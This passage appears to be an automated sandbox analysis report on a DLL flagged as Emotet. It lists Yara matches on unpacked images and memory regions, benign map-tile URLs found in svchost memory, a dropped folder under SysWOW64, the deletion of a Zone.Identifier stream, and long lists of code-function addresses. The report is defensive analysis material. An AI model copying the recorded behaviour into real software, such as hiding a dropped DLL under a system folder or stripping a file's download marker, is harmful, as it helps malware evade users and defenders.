Source: svchost.exe, 00000009.00000002.407719066.000001424C640000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000009.00000002.403271535.000001424C629000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000009.00000003.334621644.000001424C634000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000009.00000003.334621644.000001424C634000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000009.00000003.334621644.000001424C634000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000009.00000003.334621644.000001424C634000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.369075670.000001424C63D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000009.00000003.369069267.000001424C642000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.369057963.000001424C641000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.409097273.000001424C64C000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.369083115.000001424C645000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 7.2.rundll32.exe.c620f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.b10000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.632468.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a63b78.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.9e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.a63b78.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1110000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.a10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.1110000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.9e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.a10000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a63b78.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.632468.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.a63b78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.9e0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a63b78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.32a4168.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.c620f8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a63b78.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.9e0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.9e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.b10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a63b78.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a63b78.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.9e0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.32a4168.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.bc0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.10f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.3273688.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.10f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.bc0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.9e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a63b78.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.3273688.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.9e0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.a63b78.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.540649559.00000000010F0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.557294263.0000000001110000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.582540666.0000000000A5C000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.546594533.0000000000A10000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.659478506.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.558410733.0000000000A5C000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.558256416.00000000009E0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.581726309.0000000000A5C000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.582467938.00000000009E0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.659377295.000000000061A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.601059851.00000000009E0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.528291798.0000000000C69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.601107965.0000000000A5C000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.557479491.000000000328A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.556361000.0000000000C4A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.559892277.0000000000A5C000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.556237004.0000000000B10000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.581678982.00000000009E0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.559720602.00000000009E0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.540803207.000000000325A000.00000004.00000020.sdmp, type: MEMORY

System Summary:

Source: TYLNb8VvnmYA.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5808 -ip 5808

Source: C:\Windows\SysWOW64\rundll32.exe

File deleted: C:\Windows\SysWOW64\Gipupxhph\siawepkk.qzv:Zone.Identifier

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Gipupxhph\

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECCA6D0	0_2_6ECCA6D0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECCE6E0	0_2_6ECCE6E0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECC66E0	0_2_6ECC66E0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECC5EA0	0_2_6ECC5EA0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECD0F10	0_2_6ECD0F10
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECC1C10	0_2_6ECC1C10
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECC75F4	0_2_6ECC75F4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECC9D50	0_2_6ECC9D50
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECE0A61	0_2_6ECE0A61
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECCD380	0_2_6ECCD380
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECC38C0	0_2_6ECC38C0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECD01D0	0_2_6ECD01D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6ECCA6D0	4_2_6ECCA6D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6ECCE6E0	4_2_6ECCE6E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6ECC66E0	4_2_6ECC66E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6ECC5EA0	4_2_6ECC5EA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6ECD0F10	4_2_6ECD0F10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6ECC1C10	4_2_6ECC1C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6ECC75F4	4_2_6ECC75F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6ECC9D50	4_2_6ECC9D50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6ECE0A61	4_2_6ECE0A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6ECCD380	4_2_6ECCD380
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6ECC38C0	4_2_6ECC38C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6ECD01D0	4_2_6ECD01D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0110ED95	5_2_0110ED95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_011106EF	5_2_011106EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01108518	5_2_01108518
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01113306	5_2_01113306
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F4716	5_2_010F4716
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0110D10B	5_2_0110D10B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F5314	5_2_010F5314
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F8112	5_2_010F8112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0110710D	5_2_0110710D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01103130	5_2_01103130
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010FB12E	5_2_010FB12E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0110473A	5_2_0110473A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F6125	5_2_010F6125
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F7739	5_2_010F7739
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010FE336	5_2_010FE336
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0110CF2C	5_2_0110CF2C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F4F42	5_2_010F4F42
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F635F	5_2_010F635F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0110C145	5_2_0110C145
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F8D59	5_2_010F8D59
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0111314A	5_2_0111314A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01112D4F	5_2_01112D4F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0110C772	5_2_0110C772
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F196D	5_2_010F196D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F996C	5_2_010F996C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F5166	5_2_010F5166
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010FDD66	5_2_010FDD66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F9565	5_2_010F9565
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01105B7C	5_2_01105B7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0110F561	5_2_0110F561
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01112560	5_2_01112560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F597D	5_2_010F597D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F2B7C	5_2_010F2B7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F2176	5_2_010F2176
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F2575	5_2_010F2575
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F938F	5_2_010F938F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F7D87	5_2_010F7D87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010FF984	5_2_010FF984
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01111987	5_2_01111987
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F33A9	5_2_010F33A9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0110BFA1	5_2_0110BFA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_011077A7	5_2_011077A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0110E7DA	5_2_0110E7DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F2DC5	5_2_010F2DC5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_011089DA	5_2_011089DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_011013DB	5_2_011013DB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F5DC3	5_2_010F5DC3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F39C3	5_2_010F39C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01104DC5	5_2_01104DC5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01100FC5	5_2_01100FC5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010FFBEF	5_2_010FFBEF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010FB7EC	5_2_010FB7EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_011091F7	5_2_011091F7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0110D5FE	5_2_0110D5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F6BFE	5_2_010F6BFE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_011135E3	5_2_011135E3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F1DF9	5_2_010F1DF9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010FF20D	5_2_010FF20D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01101C12	5_2_01101C12
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01112C16	5_2_01112C16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0110BA18	5_2_0110BA18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01100A37	5_2_01100A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0110CC3F	5_2_0110CC3F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01100824	5_2_01100824
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F3E3B	5_2_010F3E3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0110645F	5_2_0110645F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0110604E	5_2_0110604E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01111C71	5_2_01111C71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0110E478	5_2_0110E478
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01110C66	5_2_01110C66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F3085	5_2_010F3085
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010FC69B	5_2_010FC69B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010FF699	5_2_010FF699
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010FD899	5_2_010FD899
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F68AD	5_2_010F68AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0110B0BA	5_2_0110B0BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010FF4A5	5_2_010FF4A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01103ABE	5_2_01103ABE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_011004A4	5_2_011004A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010FAEB9	5_2_010FAEB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_011056A9	5_2_011056A9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01110AD3	5_2_01110AD3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_01107EDD	5_2_01107EDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010F54C0	5_2_010F54C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010FA8E8	5_2_010FA8E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_011120F8	5_2_011120F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010FE6FD	5_2_010FE6FD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_010FBEF5	5_2_010FBEF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0112ED95	8_2_0112ED95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_011306EF	8_2_011306EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01118112	8_2_01118112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01115314	8_2_01115314
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01114716	8_2_01114716
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01128518	8_2_01128518
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01133306	8_2_01133306
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0112D10B	8_2_0112D10B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0112710D	8_2_0112710D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01123130	8_2_01123130
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0111E336	8_2_0111E336
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01117739	8_2_01117739
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0112473A	8_2_0112473A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01116125	8_2_01116125
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0112CF2C	8_2_0112CF2C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0111B12E	8_2_0111B12E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01118D59	8_2_01118D59
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0111635F	8_2_0111635F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01114F42	8_2_01114F42
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0112C145	8_2_0112C145
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0113314A	8_2_0113314A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01132D4F	8_2_01132D4F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0112C772	8_2_0112C772
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01112575	8_2_01112575
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01112176	8_2_01112176
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0111597D	8_2_0111597D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01112B7C	8_2_01112B7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01125B7C	8_2_01125B7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0112F561	8_2_0112F561
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01132560	8_2_01132560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01119565	8_2_01119565
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01115166	8_2_01115166
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0111DD66	8_2_0111DD66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0111196D	8_2_0111196D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0111996C	8_2_0111996C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01131987	8_2_01131987
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0111F984	8_2_0111F984
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01117D87	8_2_01117D87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0111938F	8_2_0111938F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0112BFA1	8_2_0112BFA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_011277A7	8_2_011277A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_011133A9	8_2_011133A9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0112E7DA	8_2_0112E7DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_011289DA	8_2_011289DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_011213DB	8_2_011213DB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01115DC3	8_2_01115DC3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_011139C3	8_2_011139C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01112DC5	8_2_01112DC5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01124DC5	8_2_01124DC5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01120FC5	8_2_01120FC5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_011291F7	8_2_011291F7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01111DF9	8_2_01111DF9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0112D5FE	8_2_0112D5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01116BFE	8_2_01116BFE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_011335E3	8_2_011335E3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0111B7EC	8_2_0111B7EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0111FBEF	8_2_0111FBEF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01121C12	8_2_01121C12
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01132C16	8_2_01132C16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0112BA18	8_2_0112BA18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0111F20D	8_2_0111F20D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01120A37	8_2_01120A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01113E3B	8_2_01113E3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0112CC3F	8_2_0112CC3F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01120824	8_2_01120824
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0112645F	8_2_0112645F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0112604E	8_2_0112604E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01131C71	8_2_01131C71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0112E478	8_2_0112E478
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01130C66	8_2_01130C66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0111F699	8_2_0111F699
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0111D899	8_2_0111D899
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0111C69B	8_2_0111C69B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01113085	8_2_01113085
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0112B0BA	8_2_0112B0BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0111AEB9	8_2_0111AEB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01123ABE	8_2_01123ABE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0111F4A5	8_2_0111F4A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_011204A4	8_2_011204A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_011256A9	8_2_011256A9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_011168AD	8_2_011168AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01130AD3	8_2_01130AD3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_01127EDD	8_2_01127EDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_011154C0	8_2_011154C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0111BEF5	8_2_0111BEF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_011320F8	8_2_011320F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0111E6FD	8_2_0111E6FD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0111A8E8	8_2_0111A8E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BE06EF	13_2_00BE06EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BDED95	13_2_00BDED95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BD3ABE	13_2_00BD3ABE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BCAEB9	13_2_00BCAEB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BDB0BA	13_2_00BDB0BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC68AD	13_2_00BC68AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BD56A9	13_2_00BD56A9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BD04A4	13_2_00BD04A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BCF4A5	13_2_00BCF4A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BCF699	13_2_00BCF699
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BCD899	13_2_00BCD899
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BCC69B	13_2_00BCC69B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC3085	13_2_00BC3085
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BCE6FD	13_2_00BCE6FD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BE20F8	13_2_00BE20F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BCBEF5	13_2_00BCBEF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BCA8E8	13_2_00BCA8E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BD7EDD	13_2_00BD7EDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BE0AD3	13_2_00BE0AD3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00BC54C0	13_2_00BC54C0
